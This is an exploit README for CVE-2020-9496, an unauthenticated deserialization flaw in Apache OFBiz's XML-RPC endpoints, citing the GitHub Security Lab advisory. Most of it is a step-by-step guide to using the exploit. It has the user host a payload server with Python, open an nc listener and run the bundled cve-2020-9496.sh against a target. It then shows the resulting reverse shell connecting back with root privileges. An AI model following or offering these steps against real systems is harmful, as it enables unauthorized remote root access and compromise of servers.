# CVE-2020-9496
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.
# Affected Version 17.12.01
# Fixed Versions 18.12.01, 17.12.04
Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's Post: https://issues.apache.org/jira/browse/OFBIZ-11716
Github's POC: https://github.com/g33xter/CVE-2020-9496
In order to make this exploit work, you will need to make the following steps:
### Step 1: Host HTTP Service with python3
```
> sudo python3 -m http.server 80
```
### Step 2: Run nc listener in the desired port (Recommended 8001)
```
> nc -nlvp 8001
```
### Step 3: Change Website's URL and Port inside the script:
```
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
```
### Step 4: Run the exploit as shown below
```
> ./cve-2020-9496.sh -i IP -p PORT
```
### Step 5: Check nc listener
```
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01#
```
[4.0K] /data/pocs/e78aec149b48df303dc749dcfb86cd588eecff2a
├── [3.0K] cve-2020-9496.sh
└── [1.4K] README.md
0 directories, 2 files